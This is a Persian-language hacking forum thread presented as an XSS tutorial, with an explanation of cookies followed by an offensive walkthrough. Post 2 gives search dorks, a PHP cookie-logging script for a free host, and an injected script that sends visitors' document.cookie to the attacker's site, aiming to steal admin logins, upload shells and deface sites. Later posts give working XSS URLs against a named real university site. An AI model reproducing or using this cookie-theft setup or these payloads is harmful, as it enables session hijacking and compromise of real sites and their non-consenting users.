• 1 Vote(s) - 5 Average
  • 1
  • 2
  • 3
  • 4
  • 5
اموزش XSS و کدهای ان
#1
درود
یک بار اقا امیر و یک بار پروین خانم درخواست اموزش XSS رو داشتن که من کم کم اموزش XSS رو تقدیم اعضای پارسی کدرز میکنم.

XSS چیست ؟


XSS یا همون CSS که مخفف کلمه Cross Site Scripting می باشد CSS هم مخفف کلمه Cascading Style Sheat هست.
معمولا در این نوح حملات کوکی سیستم طرف رو میزنیم هدایتش میکنیم به یه صفحه دیگه

حالا این کوکی چیست ؟


كوكي عبارت است از يك پيغام كه سرور به مرورگر ( Browser ) شما مي فرستد. مرورگر شما اين پيغام را در يك فايل متني ( Text ) ذخيره مي كند. پس از آن هر بار كه كه شما به آن سرور مراجعه مي كنيد ( يعني يك صفحه از وب سايتي را كه روي آن سرور قرار دارد باز مي كنيد. ) يا به عبارت ديگر هر بار كه مرورگر شما (مثلاً اينترنت اكسپلورر ) در خواست يك صفحه از آن سرور مي كند اين پيغام را به آن سرور باز مي گرداند.

هدف اصلي كوكي ها شناسايي كاربران است تا تنظيماتي را كه كاربر بنا بر سليقه خود دفعة قبل روي يك وب سايت مثلاً ياهو انجام داده اكنون هم بتواند صفحه را با همان تنظيمات دفعه قبل برايش باز كند. براي مثال فرض كنيد در Hotmail يك ايميل درست كرده ايد و اكنون بعد از چند روز دوباره وارد سايت Hotmail مي شويد تا با وارد كردن ID (يا شناسه ) و پسورد وارد ايميل خود شويد و مشاهده مي كنيد كه با باز شدن صفحه ID شما از قبل نوشته شده است يا حتي اگر از قبل اين امكان را ايجاد كرده باشيد پسورد شما هم وارد شده فقط كافيست اينتر را بزنيد و وارد ايميل خود شويد. و زمانيكه در گوگل زبان خود را انتخاب مي كنيد و دفعه بعد كه وارد گوگل مي شويد و زبان مورد نظر شما به طور اتوماتيك انتخاب شده است همه اين كارها و بسياري از كارهاي ديگر اينچنيني بوسيله كوكي ها انجام مي شود در حقيقت از طريق كوكي ها سرور وب صفحات را مطابق عادت و سليقه شما باز مي كند و به اين طريق در وقت و حوصله شما صرفه جويي مي شود




انواع کوکی ها:



کوکی هاي پایا – دائمی (presistent Cookies) :

این نوع کوکی ها به عنوان یک فایل بر روي کامپیوتر شما ذخیره می شوند و بعد از بستن

مرورگر اینترنتی شما پاك نخواهند شد و همچنان باقی می مانند. این کوکی ها قابلیت به روز شدن توسط سایت ایجاد کننده خود را دارند همچنین سایت اجازه دسترسی مستقیم به این کوکی ها رو نیز دارد حدود 80 درصد کوکی هاي مورد استفاده از این نوع هستند .



کوکی هاي موقت (Temporary Cookies) :

کوکی هایی هستند که بعد از بستن مرورگر اینترنتی شما و یا خروج از سایت استفاده کننده از کوکی پاك می شوند .

نوع دیگر کوکی هاي موقت کوکی هاي زمان دار هستند که زمانی براي کار دارند و بعد از آن اصطلاحا Expire می شوند و از کار می افتند ولی پاك نمی شوند و در صورت بازدید مجدد از سایت ممکن است به روز رسانی شوند و مجددا مورد استفاده قرار بگیرند .



کوکی هاي ناخوشایند (Unsatisfactory cookies) :

این کوکی ها اجازه دسترسی به اطلاعات خصوصی شما را براي استفاده دویاره بدون پرسیدن از شما دارند از این کوکی ها بیشتر در خرید

مورد استفاده قرار می گیرند. (SSL*) هاي اینترنتی و سایت امن

ادامه دارد ...

گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
  Reply
#2
خوب توضیحاتی دادیم در مورد این باگ بدم من به روش اسان همیشه مطالبم رو اموزش میدهم .
خوب باید باید بگیریم اول بفهمیم سایت باگ xss داره یا نداره !
یادتون باشه یاید مدیر سایت انلاین باشه مثلا توی نظرات یک وب سایت باگ xss داره وقتی کدمون رو تزریق میکنیم باید مدیر سایت صفحه رو باز کنه وقتی که باز کنه اون موقع کد ما اجرا میشه و میتونیم دستورات رو اجرا کنیم .
یادتون باشه وقتی مرورگر مدیر سایت صفحه ای که کدهای xss رو تزریق کردیم رو باز میکنه کدهای ما اجرا شده توجه کنید کدهاتون روی سیستم مدیر سایت یا کاربرقربانی اجرا میشه و ربطی به سرور نداره
وقتی کوکی رو بزنیم میتونیم یوزر و گذرواژه طرف رو بزنیم و حتی شل اپلود کنیم و کلا دیفیس کنیم.
برای پیدا کردن سایت های که باگ xss دارن نیاز به درک یا اسکنر یا به صورت دستی تست کردن داریم .
من فعلا یک درک میزارم بعد درک های بیشتری قرار میدهیم.
درک xss
Code:
"search?q=" or "search.php?q=
راه بعدی استفاده از اسکنر Acunetix Web Vulnerability Scanner سایت رو بدید اسکن کنه در صورت پیدا کردن پیغام Cross Site Scripting رو دیدید بدونید که باگ xss داره و نقطه ضعف داره !

حالا یه تست xss میکنیم سایت زیر رو باز کنید .
http://www.lifepages.org/comm/search1.asp

در قسمت سرچ برای کشف اسیب پذیری xss در قسمت سرچ عبارت زیر رو تایپ کنید :

Code:
<script>alert("xss bug find by parsicoders")</script>
اگر در قسمت سرچ باگ xss باشه پیغام xss bug find b parsicoders رو میبینید.
روی تصویر زیر کلیک کنید تا بهتر متوجه بشید :




توجه کنید باید xss در کامنت یا جایی باشه که مدی سایت ببینه بعد از پیدا کردن تارگت میخواهیم کوکیش رو بزنیم چطوری کوکی رو بزنیم ؟

اول برید توی سایت x10hosting.com یه هاست فری برای خودتون درست کنید.

کد زیر رو داخل notepad وارد کنید و به اسم iran.php ذخیره کنید.

کد :

Code:
<?php
$cookie = $_GET['cookie'];
$log = fopen("parsicoders.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>


بعد از ذخیره داخل هاست که اکانت ساختید اپلود کنید یا در هاست رایگان gigfa.com هم میشه
تازه وارد ها (فایل باید داخل پوشه Public_Html ) باشه

حالا کد زیر رو تزریق میکنیم

Code:
<script>document.location="http://www.siteshoma.com/iran.php?cookie=" + document.cookie;</script>

حالا جای siteshoma.com ادرس سایت خودتون رو بدید اگر به فرض در قسمت نظرات همچین باگی باشه هر کاربری کلیک کرد نظرات رو ببینه از ادمین تا کاربرها همه کوکیهاشون در هاستتون کنار فایلی که اپلود کردید یه فایل به اسم parsicoders.log ایجاد میشه

اگر بخواهیم مدیر سایت یا کاربرانش رو به سایت دیگری هدایت کنیم به روش زیر عمل میکنیم (بدرد fake page ) هم میخوره
به کد زیر توجه کنید :

Redirect to http://www.parsicoders.com
Code:
<script>window.location="http://parsicoders.com/index.php";</script>
.... ادامه دارد

گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
  Reply
#3
ببخشيد وسط درس يه سئوال بپرسم؟بعدا جابجاش كنيد.
من اكونتيكس رو دانلود كردم و باهاش چند تا سايت رو اسكن كردم. يكيش باگ xss داره. تو بخش جستجوي سايت اين كد شما رو نوشتم ولي اين اررور رو نداد. چرا؟
  Reply
#4
سایتو همینجا بزار تا بگم (لینک مربوط به باگ xss)

گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
  Reply
#5
اين سايته
http://jjs.uestc.edu.cn
  Reply
#6
خوب کدوم قسمتش باگ xss داره ؟
اخه اسکن کنم یه کم طول میکشه

گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
  Reply
#7
اكونتيكس كه فقط اينو نوشته
This vulnerability affects /player.php.
نميدونم درسته يانه. وقتي روي باگ قرمز كليك ميكنم اين مياد. ولي من تو قسمت سرچ صفحه اصلي سايت كد شما رو دادم.
  Reply
#8
این سایت که دادی یه عالمه باگ داره
xss هم
Code:
http://jjs.uestc.edu.cn/download.php?name=<script>alert("xss bug find by parsicoders")</script>
البته باگ های بشتر از xss داره
واسه پلیرش هم این میشه
Code:
http://jjs.uestc.edu.cn:80/player.php?vid=<script>alert("xss bug find by parsicoders")</script>

گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
  Reply
#9
اين ادرس هايي كه دادي رو از كجا اوردي؟ اكونتيكس كه اين ها رو نميده يا ميده و من بلد نيستم؟
الان من اين ادرس ها رو باز ميكنم كه هيچ اتفاقي نميوفته.
چطوري ميشه با اين باگ يه تصوير دلخواه گذاشت بذاريم تو سايت
  Reply
#10
اینجوری :

مرحله 1:


مرحله 2:



گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
  Reply


Possibly Related Threads...
Thread Author Replies Views Last Post
  اموزش DDOS Amin_Mansouri 14 29,947 01-06-2017، 02:16 PM
Last Post: taktok
  اموزش هک مودم ADSL Amin_Mansouri 7 16,259 09-06-2016، 12:36 AM
Last Post: A.S
  کلیپ اموزش حرفه ای sql injection Amin_Mansouri 0 2,713 06-07-2012، 11:58 PM
Last Post: Amin_Mansouri
  اموزش حمله Sql injection بصورت انلاین Amin_Mansouri 0 4,748 06-05-2012، 11:28 PM
Last Post: Amin_Mansouri

Forum Jump:


Users browsing this thread: 1 Guest(s)